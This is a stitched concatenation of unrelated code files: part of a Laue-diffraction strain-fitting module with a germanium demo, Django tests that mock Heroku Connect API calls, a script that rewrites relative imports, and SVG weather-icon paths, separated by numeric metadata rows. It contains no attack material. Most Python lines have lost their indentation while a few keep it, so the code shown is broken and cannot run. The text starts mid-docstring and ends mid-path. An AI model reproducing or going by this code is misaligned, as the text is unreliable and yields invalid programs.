Xmodel,Ymodel comes from G*=ha*+kb*+lc*
where T comes from Ts
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n")
error_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
# print '*************** UBmatrix_start before fit************'
# print UBmatrix_start
# print '*******************************************'
    # set the keyword defaults of error_function_strain for the fit, because leastsq handles only *args, not **kwds
error_function_strain.__defaults__ = (UBmatrix_start,
B0matrix,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_strain,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
                      ),  # args must be a tuple; the trailing comma matters!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("mesg", res[-2])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if 1:
# print("\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n")
alldata = error_function_strain(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
# alldistances_array, Uxyz, newmatrix, Ts, T
alldistances_array, Uxyz, newmatrix, refinedTs, refinedT = alldata
# print("\n--------------------\nresults:\n------------------")
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %f ---> refined %f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("q= refinedT UBstart B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", newmatrix.tolist())
# print("Uxyz", Uxyz.tolist())
# print("refinedT", refinedT.tolist())
# print("refinedTs", refinedTs.tolist())
# print("refined_values", refined_values)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
def error_strain_from_elongation(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
    calculate an array where each element is the sum of 3 distances between aligned points composing one single Laue spot
    Each elongated spot is composed of 3 points: P1, Pc, P2 (Pc at the center and P1, P2 at the ends)
    error = sum (P1-P1exp)**2 + (P2-P2exp)**2 + (Pc-Pcexp)**2
    But since the P1exp end could be wrongly assigned to the simulated P2 end:
    error = sum (P1-P1exp)**2 + (P1-P2exp)**2 - P1P2exp**2 +
            (P2-P2exp)**2 + (P2-P1exp)**2 - P1P2exp**2
            + (Pc-Pcexp)**2
strain axis in sample frame:
axis_angle_1, axis_angle_2,minstrainamplitude,zerostrain,maxstrainamplitude
example: minstrainamplitude=0.98, maxstrainamplitude=1.05, zerostrain=1
u= (cos angle1, sin angle 1 cos angle 2, sin angle1 sin angle 2)
X1Model, Y1Model, XcModel,YcModel
tensile_along_u(v, tensile, u='zsample')
q = refinedStrain refinedUzUyUz Ustart B0 G*
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
    Strain: 6 components of an upper-triangular matrix ( T00 T01 T02)
                                                        (  0  T11 T12)
                                                        (  0   0  T22)
    one element must be fixed (usually T00 = 1)
Algebra:
X=PX' e'1 e'2 e'3
| | |
v v v
e1 ( . . . )
P= e2 ( . . . )
e3 ( . . . )
If A transform expressed in (e1,e2,e3) basis
and A' same transform but expressed in (e'1,e'2,e'3) basis
then A'=P-1 A P
X_LT=P X_sample
P=(cos40, 0 -sin40)
(0 1 0 )
(sin40 0 cos40)
Strain_sample=P-1 Strain_LT P
Strain_LT = P Strain_Sample P-1
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'calibrationparameters', calibrationparameters
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
straincomponents = np.array(allparameters[8:14])
Ts = np.array([straincomponents[:3],
[0.0, straincomponents[3], straincomponents[4]],
[0, 0, straincomponents[5]]])
# print 'Ts before', Ts
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
            if parameter_name == "angley":
                Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
            elif parameter_name == "anglex":
                Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
            elif parameter_name == "anglez":
                Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("Ts00", "Ts01", "Ts02", "Ts11", "Ts12", "Ts22"):
# print 'got Ts elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Ts%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
# print 'Ts after', Ts
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
newmatrix = np.dot(Uxyz, initrot)
# print 'Uxyz', Uxyz
# print 'newmatrix', newmatrix
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
# print 'T', T
newmatrix = np.dot(T, newmatrix)
if 0: # verbose:
print("initrot", initrot)
print("newmatrix", newmatrix)
print("Miller_indices", Miller_indices)
print("absolutespotsindices", absolutespotsindices)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, Ts, T
else:
return alldistances_array
# --- ----- TESTS & DEMOS ----------------------
def test_generalfitfunction():
# Ge example unstrained
pixX = np.array([1027.1099965580365, 1379.1700028337193, 1288.1100055910788, 926.219994375393, 595.4599989710869, 1183.2699986884652, 1672.670001029018, 1497.400007802548, 780.2700069727559, 819.9099991880139, 873.5600007021501, 1579.39000403102, 1216.4900044928474, 1481.199997684615, 399.87000836895436, 548.2499911593322, 1352.760007116035, 702.5200057620646, 383.7700117705855, 707.2000052800154, 1140.9300043834062, 1730.3299981313016, 289.68999155533413, 1274.8600008806216, 1063.2499947675371, 1660.8600022917144, 1426.670005812432])
pixY = np.array([1293.2799953573963, 1553.5800003037994, 1460.1599988550274, 872.0599978043742, 876.4400033114814, 598.9200007214372, 1258.6199918206175, 1224.7000037967478, 1242.530005349013, 552.8399954684833, 706.9700021553684, 754.63000554209, 1042.2800069222762, 364.8400055136739, 1297.1899933698528, 1260.320007366279, 568.0299942819768, 949.8800073732916, 754.580011319991, 261.1099917270594, 748.3999917806088, 1063.319998717625, 945.9700059216573, 306.9500110237749, 497.7900029269757, 706.310001700921, 858.780004244009])
miller_indices = np.array([[3.0, 3.0, 3.0], [2.0, 4.0, 2.0], [3.0, 5.0, 3.0], [5.0, 3.0, 3.0], [6.0, 2.0, 4.0], [6.0, 4.0, 2.0], [3.0, 5.0, 1.0], [4.0, 6.0, 2.0], [5.0, 3.0, 5.0], [7.0, 3.0, 3.0], [4.0, 2.0, 2.0], [5.0, 5.0, 1.0], [5.0, 5.0, 3.0], [7.0, 5.0, 1.0], [5.0, 1.0, 5.0], [3.0, 1.0, 3.0], [8.0, 6.0, 2.0], [7.0, 3.0, 5.0], [5.0, 1.0, 3.0], [9.0, 3.0, 3.0], [7.0, 5.0, 3.0], [5.0, 7.0, 1.0], [7.0, 1.0, 5.0], [5.0, 3.0, 1.0], [9.0, 5.0, 3.0], [7.0, 7.0, 1.0], [3.0, 3.0, 1.0]])
starting_orientmatrix = np.array([[-0.9727538909589738, -0.21247913537718385, 0.09274958034159074],
[0.22567394392094073, -0.7761682018781203, 0.5887564805829774],
[-0.053107604650232926, 0.593645098498364, 0.8029726516869564]])
# B0matrix = np.array([[0.17675651789659746, -2.8424615990749217e-17, -2.8424615990749217e-17],
# [0.0, 0.17675651789659746, -1.0823215193524997e-17],
# [0.0, 0.0, 0.17675651789659746]])
pixelsize = 0.08057
calibparameters = [69.196, 1050.78, 1116.22, 0.152, -0.251]
absolutespotsindices = np.arange(len(pixY))
#
varying_parameters_keys = ["anglex", "angley", "anglez", "a", "b", "alpha", "beta", "gamma", "depth"]
varying_parameters_values_array = [0.0, -0, 0.0, 5.678, 5.59, 89.999, 90, 90.0001, 0.02]
# varying_parameters_keys = ['distance','xcen','ycen','beta','gamma',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.5, 1049,1116,0,0,
# 0., -0, 0.,
# 5.678, 5.59, 89.999, 90, 90.0001]
# varying_parameters_keys = ['distance','xcen','ycen',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.9, 1050,1116,
# 0., -0, 0.,
# 5.678, 5.59, 89.999, 90, 90.0001]
# varying_parameters_keys = ['distance','ycen',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.9,1116,
# 0., -0, 0.,
# 5.675, 5.65, 89.999, 90, 90.0001]
latticeparameters = DictLT.dict_Materials["Ge"][1]
B0 = CP.calc_B_RR(latticeparameters)
transformparameters = [0, 0, 0, # 3 misorientation / initial UB matrix
1.0, 0, 0, 0, 1.0, 0, 0, -0.0, 1, # Tc
1, 0, 0, 0, 1, 0, 0, 0, 1, # T
1, 0, 0, 0, 1, 0, 0, 0, 1, ] # Ts
sourcedepth = [0]
allparameters = (calibparameters + transformparameters + latticeparameters + sourcedepth)
pureUmatrix, residualdistortion = GT.UBdecomposition_RRPP(starting_orientmatrix)
# print("len(allparameters)", len(allparameters))
# print("starting_orientmatrix", starting_orientmatrix)
# print("pureUmatrix", pureUmatrix)
refined_values = fit_function_general(varying_parameters_values_array,
varying_parameters_keys,
miller_indices,
allparameters,
absolutespotsindices,
pixX,
pixY,
UBmatrix_start=pureUmatrix,
B0matrix=B0,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=pixelsize,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0")
dictRes = {}
# print("\n****** Refined Values *********\n")
for paramname, val in zip(varying_parameters_keys, refined_values):
dictRes[paramname] = val
# print("%s => %.6f" % (paramname, val))
# print("\n*******************************\n")
return dictRes
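# Hedged runner sketch: execute the Ge demo above when this module is run directly.
if __name__ == "__main__":
    print(test_generalfitfunction())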
# ---- apps/utils/admin/__init__.py (repo: jorgesaw/oclock, license: MIT) ----
from .mixins import ActiveModelSuperUserMixin
# ---- tests/commands/test_import_mappings.py (repo: Thermondo/django-heroku-connect, license: Apache-2.0) ----
import io
import json
import httpretty
import pytest
from django.core.management import CommandError, call_command
from heroku_connect.management.commands.import_mappings import Command
from tests import fixtures
class TestImportMapping:
@httpretty.activate
def test_app_name(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command("import_mappings", "--app", "ninja")
@httpretty.activate
def test_connection_id(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command("import_mappings", "--connection", "1")
@httpretty.activate
def test_no_app_no_connection_id(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings")
assert (
"You need ether specify the application name or the connection ID."
in str(e.value)
)
@httpretty.activate
def test_no_connections(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/users/me/apps/ninja/auth",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
with io.StringIO() as stdout:
with pytest.raises(CommandError) as e:
call_command(
"import_mappings",
"--app",
"ninja",
"--wait-interval",
"0", # don't need to wait when mocking calls
stdout=stdout,
)
stdout.seek(0)
console = stdout.read()
assert (
"No associated connections found"
" for the current user with the app 'ninja'."
) in str(e.value)
assert console == (
"Fetching connections.\n"
"No associated connections found for the current user with the app 'ninja'.\n"
"Linking the current user with Heroku Connect.\n"
"Fetching connections.\n"
)
@httpretty.activate
def test_authentication_failed(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/users/me/apps/ninja/auth",
body=json.dumps({"error": "permission denied"}),
status=403,
content_type="application/json",
)
with io.StringIO() as stdout:
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja", stdout=stdout)
stdout.seek(0)
console = stdout.read()
assert "Authentication failed" in str(e.value)
assert console == (
"Fetching connections.\n"
"No associated connections found for the current user with the app 'ninja'.\n"
"Linking the current user with Heroku Connect.\n"
)
@httpretty.activate
def test_multiple_connections(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": [fixtures.connection, fixtures.connection]}),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert (
"More than one associated connections found"
" for the current user with the app 'ninja'."
" Please specify the connection ID."
) in str(e.value)
@httpretty.activate
def test_upload_failed(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"error": "internal server error"},
status=500,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert "Failed to upload the mapping" in str(e.value)
@httpretty.activate
def test_load_connection_failed(self):
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body="{'error': 'internal server error'}",
status=500,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert "Failed to load connections" in str(e.value)
@httpretty.activate
def test_waiting(self):
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/1",
body=json.dumps(fixtures.connection),
status=200,
content_type="application/json",
)
Command().wait_for_import("1", 0)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/2",
data={"error": "internal server error"},
status=500,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
Command().wait_for_import("2", 0)
assert "Failed to fetch connection information." in str(e.value)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/1",
body=json.dumps(fixtures.connection),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command(
"import_mappings", "--app", "ninja", "--wait", "--wait-interval", "0"
)
| 35.933594
| 90
| 0.563866
| 942
| 9,199
| 5.410828
| 0.121019
| 0.073377
| 0.086325
| 0.125172
| 0.87267
| 0.855405
| 0.854228
| 0.852658
| 0.835393
| 0.817344
| 0
| 0.017167
| 0.316121
| 9,199
| 255
| 91
| 36.07451
| 0.793038
| 0.004022
| 0
| 0.709544
| 0
| 0.041494
| 0.300764
| 0
| 0
| 0
| 0
| 0
| 0.037344
| 1
| 0.037344
| false
| 0
| 0.112033
| 0
| 0.153527
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfe21da6aca97f585d01fe95da36e08f29e5e2fb
| 1,141
|
py
|
Python
|
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | 1
|
2022-03-18T15:42:45.000Z
|
2022-03-18T15:42:45.000Z
|
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | null | null | null |
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | null | null | null |
import os
modules_non_pointes = ["multiprocessing"]
def depointe():
""" enlever les '.' dans from .xxx import yyy -> on obtient from xxx import yyy"""
for fic in (liste_fic:=os.listdir(".")):
if os.path.isfile(fic) and not fic.startswith("_") and not fic.startswith('.'):
with open(fic,"r") as fin:
lignes=fin.readlines()
with open(fic,'w') as fout:
for i in range(len(lignes)):
ligne=lignes[i]
if ligne.startswith("from"):
mots=ligne.split()
mots[1]=mots[1].strip('.')
lignes[i]=" ".join(mots)+"\n"
fout.writelines(lignes)
def pointe():
""" ajouter des '.' dans from xxx import yyy -> on obtient from .xxx import yyy"""
for fic in (liste_fic:=os.listdir(".")):
if os.path.isfile(fic) and not fic.startswith("_") and not fic.startswith('.'):
with open(fic,"r") as fin:
lignes=fin.readlines()
with open(fic,'w') as fout:
for i in range(len(lignes)):
ligne=lignes[i]
if ligne.startswith("from"):
mots=ligne.split()
if mots[1] not in modules_non_pointes:
mots[1]="."+mots[1]
lignes[i]=" ".join(mots)+"\n"
fout.writelines(lignes)
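# A minimal, hypothetical entry point (not part of the original module),
# sketching how the two helpers might be driven from the command line; run it
# from the directory whose files should be rewritten.
if __name__ == "__main__":
    import sys
    # "pointe" restores package-relative imports; anything else strips them.
    if len(sys.argv) > 1 and sys.argv[1] == "pointe":
        pointe()
    else:
        depointe()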
| 31.694444
| 83
| 0.617003
| 171
| 1,141
| 4.070175
| 0.292398
| 0.03592
| 0.074713
| 0.091954
| 0.807471
| 0.807471
| 0.807471
| 0.807471
| 0.704023
| 0.704023
| 0
| 0.00547
| 0.198948
| 1,141
| 35
| 84
| 32.6
| 0.756018
| 0.13234
| 0
| 0.758621
| 0
| 0
| 0.042008
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfee7c528676afd423c2020563c3617983153b91
| 10,537
|
py
|
Python
|
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | 19
|
2021-04-29T02:22:13.000Z
|
2022-01-11T19:41:58.000Z
|
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | null | null | null |
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Published March 2015
# Author : Greg Fabre - http://www.iero.org
# Based on Noah Blon's work : http://codepen.io/noahblon/details/lxukH
# Public domain source code
def getHome():
return '<g transform="matrix(6.070005,0,0,5.653153,292.99285,506.46284)"><path d="M 42,48 C 29.995672,48.017555 18.003366,48 6,48 L 6,27 c 0,-0.552 0.447,-1 1,-1 0.553,0 1,0.448 1,1 l 0,19 c 32.142331,0.03306 13.954169,0 32,0 l 0,-18 c 0,-0.552 0.447,-1 1,-1 0.553,0 1,0.448 1,1 z"/><path d="m 47,27 c -0.249,0 -0.497,-0.092 -0.691,-0.277 L 24,5.384 1.691,26.723 C 1.292,27.104 0.659,27.091 0.277,26.692 -0.105,26.293 -0.09,25.66 0.308,25.278 L 24,2.616 47.691,25.277 c 0.398,0.382 0.413,1.015 0.031,1.414 C 47.526,26.896 47.264,27 47,27 Z"/><path d="m 39,15 c -0.553,0 -1,-0.448 -1,-1 L 38,8 32,8 C 31.447,8 31,7.552 31,7 31,6.448 31.447,6 32,6 l 8,0 0,8 c 0,0.552 -0.447,1 -1,1 z" /></g>'
# Forecast.io icons
# clear-day, clear-night, rain, snow, sleet, wind, fog, cloudy, partly-cloudy-day, or partly-cloudy-night.
def getClearDay():
return '<path d="M71.997,51.999h-3.998c-1.105,0-2-0.895-2-1.999s0.895-2,2-2h3.998 c1.105,0,2,0.896,2,2S73.103,51.999,71.997,51.999z M64.142,38.688c-0.781,0.781-2.049,0.781-2.828,0 c-0.781-0.781-0.781-2.047,0-2.828l2.828-2.828c0.779-0.781,2.047-0.781,2.828,0c0.779,0.781,0.779,2.047,0,2.828L64.142,38.688z M50.001,61.998c-6.627,0-12-5.372-12-11.998c0-6.627,5.372-11.999,12-11.999c6.627,0,11.998,5.372,11.998,11.999 C61.999,56.626,56.628,61.998,50.001,61.998z M50.001,42.001c-4.418,0-8,3.581-8,7.999c0,4.417,3.583,7.999,8,7.999 s7.998-3.582,7.998-7.999C57.999,45.582,54.419,42.001,50.001,42.001z M50.001,34.002c-1.105,0-2-0.896-2-2v-3.999 c0-1.104,0.895-2,2-2c1.104,0,2,0.896,2,2v3.999C52.001,33.106,51.104,34.002,50.001,34.002z M35.86,38.688l-2.828-2.828 c-0.781-0.781-0.781-2.047,0-2.828s2.047-0.781,2.828,0l2.828,2.828c0.781,0.781,0.781,2.047,0,2.828S36.641,39.469,35.86,38.688z M34.002,50c0,1.104-0.896,1.999-2,1.999h-4c-1.104,0-1.999-0.895-1.999-1.999s0.896-2,1.999-2h4C33.107,48,34.002,48.896,34.002,50 z M35.86,61.312c0.781-0.78,2.047-0.78,2.828,0c0.781,0.781,0.781,2.048,0,2.828l-2.828,2.828c-0.781,0.781-2.047,0.781-2.828,0 c-0.781-0.78-0.781-2.047,0-2.828L35.86,61.312z M50.001,65.998c1.104,0,2,0.895,2,1.999v4c0,1.104-0.896,2-2,2 c-1.105,0-2-0.896-2-2v-4C48.001,66.893,48.896,65.998,50.001,65.998z M64.142,61.312l2.828,2.828c0.779,0.781,0.779,2.048,0,2.828 c-0.781,0.781-2.049,0.781-2.828,0l-2.828-2.828c-0.781-0.78-0.781-2.047,0-2.828C62.093,60.531,63.36,60.531,64.142,61.312z" />'
def getClearNight():
return '<path d="M50,61.998c-6.627,0-11.999-5.372-11.999-11.998 c0-6.627,5.372-11.999,11.999-11.999c0.755,0,1.491,0.078,2.207,0.212c-0.132,0.576-0.208,1.173-0.208,1.788 c0,4.418,3.582,7.999,8,7.999c0.615,0,1.212-0.076,1.788-0.208c0.133,0.717,0.211,1.452,0.211,2.208 C61.998,56.626,56.626,61.998,50,61.998z M48.212,42.208c-3.556,0.813-6.211,3.989-6.211,7.792c0,4.417,3.581,7.999,7.999,7.999 c3.802,0,6.978-2.655,7.791-6.211C52.937,50.884,49.115,47.062,48.212,42.208z" />'
def getRain():
return '<path d="m 59.999,65.64 c -0.266,0 -0.614,0 -1,0 0,-1.372 -0.319,-2.742 -0.943,-4 0.777,0 1.451,0 1.943,0 4.418,0 7.999,-3.58 7.999,-7.998 0,-4.418 -3.581,-7.999 -7.999,-7.999 -1.6,0 -3.083,0.481 -4.334,1.29 -1.231,-5.316 -5.973,-9.289 -11.664,-9.289 -6.627,0 -11.998,5.372 -11.998,11.998 0,5.953 4.339,10.879 10.023,11.822 -0.637,1.217 -0.969,2.549 -1.012,3.887 -7.406,-1.399 -13.012,-7.895 -13.012,-15.709 0,-8.835 7.162,-15.998 15.998,-15.998 6.004,0 11.229,3.312 13.965,8.204 0.664,-0.114 1.337,-0.205 2.033,-0.205 6.627,0 11.998,5.372 11.998,11.999 0,6.627 -5.37,11.998 -11.997,11.998 z m -9.998,-7.071 3.535,3.535 c 1.951,1.953 1.951,5.118 0,7.07 -1.953,1.953 -5.119,1.953 -7.07,0 -1.953,-1.952 -1.953,-5.117 0,-7.07 l 3.535,-3.535 z" />'
def getSnow():
return '<path d="M63.999,64.943v-4.381c2.389-1.385,3.999-3.963,3.999-6.922 c0-4.416-3.581-7.998-7.999-7.998c-1.6,0-3.083,0.48-4.333,1.291c-1.231-5.317-5.974-9.291-11.665-9.291 c-6.627,0-11.998,5.373-11.998,12c0,3.549,1.55,6.729,4,8.924v4.916c-4.777-2.768-8-7.922-8-13.84 c0-8.836,7.163-15.999,15.998-15.999c6.004,0,11.229,3.312,13.965,8.204c0.664-0.113,1.337-0.205,2.033-0.205 c6.627,0,11.999,5.373,11.999,11.998C71.998,58.863,68.655,63.293,63.999,64.943z M42.001,57.641c1.105,0,2,0.896,2,2 c0,1.105-0.895,2-2,2c-1.104,0-1.999-0.895-1.999-2C40.002,58.537,40.897,57.641,42.001,57.641z M42.001,65.641c1.105,0,2,0.895,2,2 c0,1.104-0.895,1.998-2,1.998c-1.104,0-1.999-0.895-1.999-1.998C40.002,66.535,40.897,65.641,42.001,65.641z M50.001,61.641 c1.104,0,2,0.895,2,2c0,1.104-0.896,2-2,2c-1.105,0-2-0.896-2-2C48.001,62.535,48.896,61.641,50.001,61.641z M50.001,69.639 c1.104,0,2,0.896,2,2c0,1.105-0.896,2-2,2c-1.105,0-2-0.895-2-2C48.001,70.535,48.896,69.639,50.001,69.639z M57.999,57.641 